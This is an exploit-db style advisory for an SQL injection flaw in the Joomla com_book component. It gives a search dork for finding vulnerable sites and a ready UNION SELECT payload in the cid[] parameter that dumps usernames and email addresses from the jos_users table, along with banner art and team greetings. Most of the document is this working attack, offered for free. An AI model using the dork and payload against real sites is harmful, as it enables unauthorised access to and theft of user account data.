Joomla! Component com_book – SQL Injection

  • 作者: Evil-Cod3r
    日期: 2010-01-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11213/
  • ==============================================================================
__ ___ _ 
 / \| | | |/ \| | | |
/ _ \ | | | | / _ \ | |_| |
 / ___ \| |___| |___ / ___ \|_|
 IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
 

==============================================================================
[»] ~ Note : : <3 v4sploiter
==============================================================================
[»] Joomla (com_book) SQL injection Vulnerability 
==============================================================================

	[»] Script: [ Joomla Comp ]
	[»] Language: [ PHP ]
[»] Dork: [ inurl:"com_book" ]
	[»] Founder:[ Evil-Cod3r ]
[»] Gr44tz: [ v4sploiter - Mr.SaFa7 - Red Virus - Mn7os - Recruit ='( ]
[»] Team: [ v4-Team.com/cc ]
[»] Price:[ Free ]
###########################################################################

http://localhost/path/index.php?option=com_book&controller=listtour&task=showTour&cid[]=Exploit

 Exploit : -

index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(username,0x3a,email),3,4,5,6,7,8,9,10 from jos_users-- 


Author: Evil-Cod3r

###########################################################################
    Python